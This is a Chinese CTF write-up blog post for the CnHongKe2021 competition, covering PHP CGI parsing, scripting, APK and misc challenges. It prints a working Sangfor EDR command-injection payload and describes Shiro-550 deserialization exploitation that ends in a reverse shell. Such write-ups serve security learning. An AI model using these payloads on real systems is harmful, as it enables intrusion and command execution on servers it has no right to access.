<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#000000"><meta name="author" content="gyy"><meta name="copyright" content="gyy"><meta name="generator" content="Hexo 5.2.0"><meta name="theme" content="hexo-theme-yun"><title>CnHongKe2021公测赛 | Err0r</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.22/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_ed8vp4atwoj.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => <!-- hexo-inject:begin --><!-- hexo-inject:end -->{
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link id="light-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism.css" media="(prefers-color-scheme: light)"><link id="dark-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism-tomorrow.css" media="(prefers-color-scheme: dark)"><link rel="shortcut icon" type="image/svg+xml" href="/favicon.ico"><link rel="mask-icon" href="/favicon.ico" color="#000000"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"hostname":"err0r.top","root":"/","title":"浅伴独蓝的小站","version":"1.5.1","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"想要搜些什么？","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"local_search":{"path":"/search.xml"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/utils.js"></script><script src="/js/hexo-theme-yun.js"></script><meta name="description" content="2月5日 比赛情况：     感谢大师傅们手下留情">
<meta property="og:type" content="article">
<meta property="og:title" content="CnHongKe2021公测赛">
<meta property="og:url" content="https://err0r.top/article/2021gongcesai/index.html">
<meta property="og:site_name" content="Err0r">
<meta property="og:description" content="2月5日 比赛情况：     感谢大师傅们手下留情">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205133228513.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205133840182.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205172001695.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205134031474.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205135031033.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205135241419.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205135442119.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205135511988.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205135615967.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205140020576.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205140432528.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/QQ%E5%9B%BE%E7%89%8720210205171005.jpg">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205140704301.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205140736060.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/qr1.jpg">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205165950957.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205170018477.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/image-20210205165843064.png">
<meta property="og:image" content="https://err0r.top/article/2021gongcesai/QQ%E5%9B%BE%E7%89%8720210205185049.jpg">
<meta property="article:published_time" content="2021-02-05T05:31:14.000Z">
<meta property="article:modified_time" content="2021-02-19T07:10:14.703Z">
<meta property="article:author" content="gyy">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://err0r.top/article/2021gongcesai/image-20210205133228513.png"><script src="/js/ui/mode.js"></script><!-- hexo-inject:begin --><!-- hexo-inject:end --></head><body><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="gyy"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="gyy"></a><div class="site-author-name"><a href="/about/">gyy</a></div><a class="site-name" href="/about/site.html">Err0r</a><sub class="site-subtitle">gyy</sub><div class="site-desciption">gugugu</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">21</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">5</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">26</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" title="QQ MTkwNjk2ODc2NA==" target="_blank" style="color:#12B7F5"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/Err0rCM" title="GitHub" target="_blank" style="color:#6e5494"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-github-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://space.bilibili.com/8408670" title="哔哩哔哩" target="_blank" style="color:#FF8EB3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-bilibili-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:1906968764@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-mail-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://travellings.now.sh/" title="Travelling" target="_blank" style="color:var(--hty-text-color)"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-send-plane-2-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们|友情链接" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-open-arm-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Sign"><span class="toc-number">1.</span> <span class="toc-text">Sign</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Choice"><span class="toc-number">1.1.</span> <span class="toc-text">Choice</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%AD%E8%BD%AC%E4%B9%BE%E5%9D%A4"><span class="toc-number">1.2.</span> <span class="toc-text">扭转乾坤</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web"><span class="toc-number">2.</span> <span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#EDR"><span class="toc-number">2.1.</span> <span class="toc-text">EDR</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#shiro"><span class="toc-number">2.2.</span> <span class="toc-text">shiro</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#fast-x-3"><span class="toc-number">2.3.</span> <span class="toc-text">fast x 3</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Apk"><span class="toc-number">3.</span> <span class="toc-text">Apk</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Des"><span class="toc-number">3.1.</span> <span class="toc-text">Des</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Misc"><span class="toc-number">4.</span> <span class="toc-text">Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#DTMF"><span class="toc-number">4.1.</span> <span class="toc-text">DTMF</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#HalfQR"><span class="toc-number">4.2.</span> <span class="toc-text">HalfQR</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">5.</span> <span class="toc-text">总结</span></a></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="https://err0r.top/article/2021gongcesai/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="gyy"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Err0r"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">CnHongKe2021公测赛</h1><div class="post-meta"><div class="post-time" style="display:block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <time title="创建时间：2021-02-05 13:31:14" itemprop="dateCreated datePublished" datetime="2021-02-05T13:31:14+08:00">2021-02-05</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-2-line"></use></svg></span> <time title="修改时间：2021-02-19 15:10:14" itemprop="dateModified" datetime="2021-02-19T15:10:14+08:00">2021-02-19</time></div><span class="post-count"><span class="post-symbolcount"><span class="post-meta-item-icon" title="本文字数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-file-word-line"></use></svg></span> <span title="本文字数">930</span><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读时长"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-timer-line"></use></svg></span> <span title="阅读时长">4m</span></span></span><span class="post-busuanzi"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span id="busuanzi_value_page_pv"></span></span></span><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-line"></use></svg></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category" href="/categories/Write-Up/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">Write-Up</span></a></span></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#000000;"><p>2月5日</p>
<!-- hexo-inject:begin --><!-- hexo-inject:end --><p>比赛情况：</p>
<img src="/article/2021gongcesai/image-20210205133228513.png" class="" title="rank" loading="lazy">



<p>感谢大师傅们手下留情</p>
<a id="more"></a>

<img src="/article/2021gongcesai/image-20210205133840182.png" class="" title="rank" loading="lazy">

<p>主办方平台关太快了2333，睡了一觉起来连平台都没了</p>
<h2 id="Sign"><a href="#Sign" class="headerlink" title="Sign"></a>Sign</h2><h3 id="Choice"><a href="#Choice" class="headerlink" title="Choice"></a>Choice</h3><p>PHP CGI解析漏洞出现的原因是（ ）</p>
<ul>
<li><p>A.cgi.fix_pathi配置错误</p>
</li>
<li><p>B.cgi.fix_pathinfo配置错误</p>
</li>
<li><p>C.phpinfo配置错误</p>
</li>
<li><p>D.cgi.fix__status_en配置错误</p>
</li>
</ul>
<p>很显然是<code>cgi.fix_pathinfo</code>配置错误，当设置了cgi.fix_pathinfo = 1时，PHP就会以’/‘为分割符从最后一个文件开始向前找存在的文件去执行，例如<code>/upload/a.jpg/b.php</code>.</p>
<hr>
<h3 id="扭转乾坤"><a href="#扭转乾坤" class="headerlink" title="扭转乾坤"></a>扭转乾坤</h3><p>扫码得flag</p>
<img src="/article/2021gongcesai/image-20210205172001695.png" class="" title="image-20210205172001695" loading="lazy">

<hr>
<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="EDR"><a href="#EDR" class="headerlink" title="EDR"></a>EDR</h3><p>深信服载入史册</p>
<p>直接payload打</p>
<img src="/article/2021gongcesai/image-20210205134031474.png" class="" title="image-20210205134031474" loading="lazy">

<p>Payload:</p>
<pre class="language-none"><code class="language-none">.&#x2F;?strip_slashes&#x3D;system&amp;host&#x3D;cat &#x2F;flag</code></pre>

<p>这题去年有过，是作为线下赛的题目，当时没外网，只能硬审，或者…<del>记得payload</del>，毕竟太有名了…</p>
<hr>
<h3 id="shiro"><a href="#shiro" class="headerlink" title="shiro"></a>shiro</h3><p>Shiro remeberMe反序列化漏洞（Shiro-550）</p>
<p>用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值，先base64解码然后AES解密再反序列化，就导致了反序列化RCE漏洞</p>
<img src="/article/2021gongcesai/image-20210205135031033.png" class="" title="image-20210205135031033" loading="lazy">

<p>可以如 <a target="_blank" rel="noopener" href="https://www.cnblogs.com/sup3rman/archive/2020/07/16/13322898.html">参考文章</a> 所示，利用<code>shiro.py</code>生成payload</p>
<img src="/article/2021gongcesai/image-20210205135241419.png" class="" title="image-20210205135241419" loading="lazy">

<p>当然后来才发现更简单的，直接用 <code>ShiroScan</code> 工具，可以用DNSlog的方式，也可以反弹shell，这里直接反弹shell</p>
<img src="/article/2021gongcesai/image-20210205135442119.png" class="" title="image-20210205135442119" loading="lazy">

<p>成功弹到shell</p>
<img src="/article/2021gongcesai/image-20210205135511988.png" class="" title="image-20210205135511988" loading="lazy">



<hr>
<h3 id="fast-x-3"><a href="#fast-x-3" class="headerlink" title="fast x 3"></a>fast x 3</h3><p>老脚本大师了</p>
<img src="/article/2021gongcesai/image-20210205135615967.png" class="" title="image-20210205135615967" loading="lazy">

<p>写个py脚本即可，直接上payload，蹩脚编程，师傅们见谅…</p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token comment"># -*- coding: UTF-8 -*-</span>
<span class="token triple-quoted-string string">"""
@Time ： 2021/2/5 9:22
@Auth ： gyy
@Blog ：http://err0r.top

"""</span>
<span class="token keyword">import</span> requests
<span class="token keyword">import</span> collections
url <span class="token operator">=</span> <span class="token string">"http://180.109.90.207:23891/"</span>

session <span class="token operator">=</span> requests<span class="token punctuation">.</span>session<span class="token punctuation">(</span><span class="token punctuation">)</span>

data <span class="token operator">=</span> <span class="token punctuation">&#123;</span>
    <span class="token string">"submit"</span><span class="token punctuation">:</span> <span class="token string">"提交"</span>
<span class="token punctuation">&#125;</span>
responses <span class="token operator">=</span> session<span class="token punctuation">.</span>get<span class="token punctuation">(</span>url<span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>responses<span class="token punctuation">.</span>content<span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">print</span> <span class="token punctuation">(</span><span class="token string">"1--------------------------------取字符串"</span><span class="token punctuation">)</span>
cal <span class="token operator">=</span> responses<span class="token punctuation">.</span>text<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">"\r"</span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">'\n'</span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">" "</span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">'&lt;b>'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">'&lt;/b>'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">"&lt;divid=\"math\">"</span><span class="token punctuation">,</span><span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">"&lt;/div>"</span><span class="token punctuation">,</span><span class="token string">""</span><span class="token punctuation">)</span>
<span class="token keyword">print</span> <span class="token punctuation">(</span>cal<span class="token punctuation">)</span>

<span class="token keyword">print</span> <span class="token punctuation">(</span><span class="token string">"2--------------------------------计数"</span><span class="token punctuation">)</span>
<span class="token builtin">str</span> <span class="token operator">=</span> collections<span class="token punctuation">.</span>Counter<span class="token punctuation">(</span>cal<span class="token punctuation">)</span>
str1 <span class="token operator">=</span> <span class="token builtin">dict</span><span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>str1<span class="token punctuation">)</span>

<span class="token keyword">print</span> <span class="token punctuation">(</span><span class="token string">"3--------------------------------排序"</span><span class="token punctuation">)</span>
<span class="token keyword">from</span> collections <span class="token keyword">import</span> OrderedDict
str2 <span class="token operator">=</span> OrderedDict<span class="token punctuation">(</span><span class="token builtin">sorted</span><span class="token punctuation">(</span>str1<span class="token punctuation">.</span>items<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> key<span class="token operator">=</span><span class="token keyword">lambda</span> x<span class="token punctuation">:</span>x<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>str2<span class="token punctuation">)</span>
<span class="token keyword">print</span> <span class="token punctuation">(</span><span class="token string">"4--------------------------------取key"</span><span class="token punctuation">)</span>
val <span class="token operator">=</span> <span class="token string">""</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> str2<span class="token punctuation">:</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>i<span class="token punctuation">)</span>
    val <span class="token operator">+=</span> i
val <span class="token operator">=</span> val
<span class="token keyword">print</span><span class="token punctuation">(</span>val<span class="token punctuation">)</span>

<span class="token keyword">print</span> <span class="token punctuation">(</span><span class="token string">"5--------------------------------赋data"</span><span class="token punctuation">)</span>
data<span class="token punctuation">[</span><span class="token string">'res'</span><span class="token punctuation">]</span> <span class="token operator">=</span> val
<span class="token keyword">print</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span>

<span class="token keyword">print</span> <span class="token punctuation">(</span><span class="token string">"6--------------------------------提交"</span><span class="token punctuation">)</span>
post_responses <span class="token operator">=</span> session<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token punctuation">,</span> data<span class="token operator">=</span>data<span class="token punctuation">)</span><span class="token punctuation">.</span>content<span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span>post_responses<span class="token punctuation">)</span></code></pre>

<p>编编改改凑合用</p>
<img src="/article/2021gongcesai/image-20210205140020576.png" class="" title="image-20210205140020576" loading="lazy">



<hr>
<h2 id="Apk"><a href="#Apk" class="headerlink" title="Apk"></a>Apk</h2><h3 id="Des"><a href="#Des" class="headerlink" title="Des"></a>Des</h3><p>2015ISCC的题目改题<code>没有题目的题目</code></p>
<p>主要代码</p>
<pre class="language-none"><code class="language-none">public boolean check() &#123;
     byte[] b2 &#x3D; &#123;103, 112, 111, 49, 61, 113, 117, 109, 76, 108, 77, 57, 59, 90, 64, 105, 33, 89, 74, 113, 92, 84, 87, 113, 105, 65, 35, 74, 93, 73, 43, 120&#125;;
     byte[] b3 &#x3D; this.result1.getBytes();
     for (int j &#x3D; 0; j &lt; b3.length; j++) &#123;
         Log.d(&quot;test&quot;, ((byte) (b3[j] ^ j)));
     &#125;
     if (b3.length !&#x3D; b2.length) &#123;
         return false;
     &#125;
     for (int j2 &#x3D; 0; j2 &lt; b2.length; j2++) &#123;
         if ((b3[j2] ^ b2[j2]) !&#x3D; j2) &#123;
             return false;
         &#125;
     &#125;
     return true;
 &#125;</code></pre>

<p>exp:</p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token comment">#!/usr/bin/env python</span>
<span class="token comment"># -*- coding: utf-8 -*-</span>
<span class="token keyword">from</span> pyDes <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token keyword">import</span> base64
V0 <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token number">103</span><span class="token punctuation">,</span> <span class="token number">112</span><span class="token punctuation">,</span> <span class="token number">111</span><span class="token punctuation">,</span> <span class="token number">49</span><span class="token punctuation">,</span> <span class="token number">61</span><span class="token punctuation">,</span> <span class="token number">113</span><span class="token punctuation">,</span> <span class="token number">117</span><span class="token punctuation">,</span> <span class="token number">109</span><span class="token punctuation">,</span> <span class="token number">76</span><span class="token punctuation">,</span> <span class="token number">108</span><span class="token punctuation">,</span> <span class="token number">77</span><span class="token punctuation">,</span> <span class="token number">57</span><span class="token punctuation">,</span> <span class="token number">59</span><span class="token punctuation">,</span> <span class="token number">90</span><span class="token punctuation">,</span> <span class="token number">64</span><span class="token punctuation">,</span> <span class="token number">105</span><span class="token punctuation">,</span> <span class="token number">33</span><span class="token punctuation">,</span> <span class="token number">89</span><span class="token punctuation">,</span> <span class="token number">74</span><span class="token punctuation">,</span> <span class="token number">113</span><span class="token punctuation">,</span> <span class="token number">92</span><span class="token punctuation">,</span> <span class="token number">84</span><span class="token punctuation">,</span> <span class="token number">87</span><span class="token punctuation">,</span> <span class="token number">113</span><span class="token punctuation">,</span> <span class="token number">105</span><span class="token punctuation">,</span> <span class="token number">65</span><span class="token punctuation">,</span> <span class="token number">35</span><span class="token punctuation">,</span> <span class="token number">74</span><span class="token punctuation">,</span> <span class="token number">93</span><span class="token punctuation">,</span> <span class="token number">73</span><span class="token punctuation">,</span> <span class="token number">43</span><span class="token punctuation">,</span> <span class="token number">120</span><span class="token punctuation">]</span>
<span class="token keyword">def</span> <span class="token function">DeCheck</span><span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    v1 <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token punctuation">]</span>
    <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token builtin">len</span><span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        v1<span class="token punctuation">.</span>append<span class="token punctuation">(</span><span class="token builtin">chr</span><span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">[</span>i<span class="token punctuation">]</span> <span class="token operator">^</span> i<span class="token punctuation">)</span><span class="token punctuation">)</span>
    xx <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">.</span>join<span class="token punctuation">(</span>v1<span class="token punctuation">)</span>
    <span class="token comment">##print xx</span>
    <span class="token keyword">return</span> base64<span class="token punctuation">.</span>b64decode<span class="token punctuation">(</span>xx<span class="token punctuation">)</span>
<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">'__main__'</span><span class="token punctuation">:</span>
    key <span class="token operator">=</span> <span class="token string">'ilovedes'</span>
    iv <span class="token operator">=</span> <span class="token string">'\x01\x02\x03\x04\x05\x06\x07\x08'</span>
    k <span class="token operator">=</span> des<span class="token punctuation">(</span>key<span class="token punctuation">,</span> CBC<span class="token punctuation">,</span> iv<span class="token punctuation">,</span> pad<span class="token operator">=</span><span class="token boolean">None</span><span class="token punctuation">,</span> padmode<span class="token operator">=</span>PAD_PKCS5<span class="token punctuation">)</span>
    flag <span class="token operator">=</span> k<span class="token punctuation">.</span>decrypt<span class="token punctuation">(</span>DeCheck<span class="token punctuation">(</span>V0<span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span> <span class="token string">"Your flag is: "</span> <span class="token operator">+</span> flag</code></pre>

<img src="/article/2021gongcesai/image-20210205140432528.png" class="" title="image-20210205140432528" loading="lazy">

<img src="/article/2021gongcesai/QQ%E5%9B%BE%E7%89%8720210205171005.jpg" class="" title="QQ图片20210205171005" loading="lazy">

<p>参考链接：<a target="_blank" rel="noopener" href="http://bobao.360.cn/ctf/learning/136.html">http://bobao.360.cn/ctf/learning/136.html</a></p>
<hr>
<h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="DTMF"><a href="#DTMF" class="headerlink" title="DTMF"></a>DTMF</h3><p>电话音，网上有在线识别网站</p>
<p><a target="_blank" rel="noopener" href="http://dialabc.com/sound/detect/index.html">http://dialabc.com/sound/detect/index.html</a></p>
<p>格式要求<code>.wav</code>，先用ffmpeg转格式</p>
<img src="/article/2021gongcesai/image-20210205140704301.png" class="" title="image-20210205140704301" loading="lazy">

<p>再放上去识别</p>
<img src="/article/2021gongcesai/image-20210205140736060.png" class="" title="image-20210205140736060" loading="lazy">

<pre class="language-none"><code class="language-none">CnHongKe&#123;A18D3B18C*231#&#125;</code></pre>



<hr>
<h3 id="HalfQR"><a href="#HalfQR" class="headerlink" title="HalfQR"></a>HalfQR</h3><p>二维码修复网站 <a target="_blank" rel="noopener" href="https://merricx.github.io/qrazybox/">https://merricx.github.io/qrazybox/</a></p>
<img src="/article/2021gongcesai/qr1.jpg" class="" title="QR" loading="lazy">

<p>手 撸</p>
<img src="/article/2021gongcesai/image-20210205165950957.png" class="" title="image-20210205165950957" loading="lazy">

<img src="/article/2021gongcesai/image-20210205170018477.png" class="" title="image-20210205170018477" loading="lazy">

<p>然后</p>
<img src="/article/2021gongcesai/image-20210205165843064.png" class="" title="image-20210205165843064" loading="lazy">

<p>最后</p>
<pre class="language-none"><code class="language-none">CnHongKe&#123;f88ae38f450e76d3c92410e3650df67&#125;</code></pre>

<p>也可以手算…毕竟数据域的半边东西给了</p>
<hr>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这些题目作为线下赛题目是难了，毕竟去年有过一次线下，线上赛就不说了，神仙乱斗2333，还不用交WP，希望主办方能完善赛制，首先赛后都不用交WP是挺离谱的，其次题目的质量…其实还行，但作为线上还是简单了。</p>
<img src="/article/2021gongcesai/QQ%E5%9B%BE%E7%89%8720210205185049.jpg" class="" width="233" loading="lazy">

<p>懂的都懂2333</p>
<p>还是有些收获的，提前祝大家新年快乐！</p>
</div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>gyy</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://err0r.top/article/2021gongcesai/" title="CnHongKe2021公测赛">https://err0r.top/article/2021gongcesai/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/article/hgame2021week1/" rel="prev" title="HGAME2021-week1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">HGAME2021-week1</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/article/cqb2021/" rel="next" title="春秋杯2021新春欢乐赛一道题——按F注入 对pgsql的研究"><span class="post-nav-text">春秋杯2021新春欢乐赛一道题——按F注入 对pgsql的研究</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div></main><footer class="sidebar-translate" id="footer"><div class="beian"><a rel="noopener" href="https://beian.miit.gov.cn/" 